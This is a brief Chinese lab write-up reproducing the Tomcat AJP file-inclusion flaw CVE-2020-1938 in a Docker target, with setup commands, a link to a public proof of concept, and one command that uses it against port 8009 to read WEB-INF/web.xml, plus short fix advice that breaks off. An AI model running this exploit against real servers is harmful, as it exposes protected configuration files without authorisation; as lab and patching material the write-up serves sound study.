Apache-Tomcat-Ajp漏洞——CVE-2020-1938

CVE-2020-1938

该漏洞是由于Tomcat AJp协议存在的缺陷导致的,攻击者利用该漏洞可通过构造特定参数,读取服务器下的webapp任意文件。若目标服务器同时存在上传漏洞,可以进一步实现远程代码执行。

tomcat JAP协议文件包含。

靶机 kali

攻击机 kali

环境 docker 下的 tomcat/CVE-2020-1938

版本 tomcat 9.0.30

1.开启容器

cd tomcat/CVE-2020-1938

docker-compose up -d

2.使用nmap扫描一下端口。

Apache-Tomcat-Ajp漏洞——CVE-2020-1938_第1张图片

Apache-Tomcat-Ajp漏洞——CVE-2020-1938_第2张图片

4.漏洞复现

POC:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

读取WEB-INF/web.xml文件

python CNVD-2020-10487-Tomcat-Ajp-lfi.py IP -p 8009 -f WEB-INF/web.xml

Apache-Tomcat-Ajp漏洞——CVE-2020-1938_第3张图片

后面反弹shell一直没成功,太菜了

修复建议:

1.升级版本

2在在tomcat工作目录中修改conf/server.xml

注释掉

你可能感兴趣的:(渗透测试)